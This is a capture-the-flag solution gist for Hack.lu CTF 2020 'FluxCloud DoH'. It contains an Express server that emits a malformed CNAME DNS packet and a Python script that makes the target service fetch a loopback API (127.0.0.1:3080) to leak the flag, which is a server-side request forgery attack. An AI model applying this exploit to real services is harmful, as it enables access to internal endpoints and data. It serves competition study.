@st98
Created November 26, 2020 17:19
Hack.lu CTF 2020 - FluxCloud DoH
const express = require('express');
const dnsPacket = require('dns-packet');
// Port number reported in the startup log line; the listener uses the same value.
const port = 8000;
// Express application that the route handlers in this file are registered on.
const app = express();
// Character code that the '/' handler appends to the CNAME answer data.
// Mutable on purpose: the /updateLength route overwrites it at runtime.
// Starts at 0x12 (18).
let len = 0x12;
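/**
 * GET /updateLength?len=<decimal integer>
 *
 * Overwrites the module-level `len`, which the '/' handler turns into a single
 * character with String.fromCharCode. Replies 'ok' on success and 400 with
 * 'bad len' when the parameter is missing, not a number, or outside 0..0xFFFF.
 *
 * NOTE(review): the route is unauthenticated and mutates state shared by every
 * request, so any client that can reach the listener can change it; keep this
 * server on an isolated lab network.
 */
app.get('/updateLength', (req, res) => {
  const parsed = Number.parseInt(req.query.len, 10);
  // parseInt yields NaN for a missing or non-numeric value, and
  // String.fromCharCode wraps its argument modulo 0x10000, so reject both
  // cases instead of silently storing a value that encodes as something else.
  if (!Number.isInteger(parsed) || parsed < 0 || parsed > 0xffff) {
    res.status(400).end('bad len');
    return;
  }
  len = parsed;
  console.log('updated:', len);
  res.end('ok');
});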
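/**
 * GET /
 *
 * Replies with a dns-packet encoded 'response' message holding one CNAME
 * answer for the name 'NEKO'. The answer data is eight fixed characters
 * (0x00, 0x01, then six 0x00) followed by the character whose code is the
 * current value of `len`.
 *
 * NOTE(review): the data is raw control characters rather than a hostname, so
 * this is presumably a deliberately malformed record for the CTF task; how
 * dns-packet serialises it is not visible in this file.
 */
app.get('/', (req, res) => {
  // Hex escapes replace the legacy octal escape \1, which is a SyntaxError in
  // strict mode and ES modules; the resulting string value is unchanged.
  const answerData = '\x00\x01\x00\x00\x00\x00\x00\x00' + String.fromCharCode(len);
  const packet = dnsPacket.encode({
    type: 'response',
    answers: [{ data: answerData, type: 'CNAME', name: 'NEKO' }],
  });
  res.end(packet);
});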
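// Bind to `port` instead of repeating the literal, so the listening port and
// the URL printed below cannot drift apart.
// NOTE(review): no host is passed, so Node binds the unspecified address and
// accepts connections on every interface, not only the localhost named in the
// log line. Both routes are unauthenticated; firewall the port accordingly.
app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`);
});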
import json
import requests
# Base URL of the service the requests are sent to. The commented-out line is
# the author's alternative value (apparently a local instance).
#TARGET = 'http://192.168.99.101:3000'
TARGET = 'https://doh.cloud.flu.xxx'

# Value handed to the helper server's /updateLength route; the Express server
# in this gist stores it and appends it, as a character code, to the CNAME
# answer data it serves.
i = 40


def post_query(fields):
    """POST ``fields`` as a JSON body to TARGET's /query endpoint; return the response."""
    return requests.post(
        TARGET + '/query',
        data=json.dumps(fields),
        headers={'Content-Type': 'application/json'},
    )


# 1) Configure the helper server. '(your IP address)' is a placeholder the
#    author left for the reader to fill in.
requests.get('http://(your IP address):8000/updateLength?len={}'.format(i))

# 2) First /query call: the hostname/port/path fields name the helper server,
#    reached with a plain-HTTP GET (presumably as the upstream the service
#    contacts for 'dns.google'; the service's code is not shown here).
req = post_query({
    'name': 'dns.google',
    'hostname': '(your IP address)',
    'port': 8000,
    'path': '/',
    'useHttps': False,
    'method': 'GET',
})
print(req.text)

# 3) Second /query call: same record name, but hostname/port are 127.0.0.1:3080
#    and the path carries three `query` parameters plus a trailing `a=`.
# NOTE(review): a service that lets the caller pick hostname, port and path,
# loopback included, should restrict upstreams to an allow-list; whether the
# target enforces one is not visible from this script.
req = post_query({
    'name': 'dns.google',
    'hostname': '127.0.0.1',
    'port': 3080,
    'path': '/api?query=lastAnswer:dns.google&query=lastAnswer:flag&query=lastAnswer:dns.google&a=',
    'klass': 'IN',
    'type': 'A',
    'useHttps': False,
    'method': 'GET',
})
print(hex(i), req.text)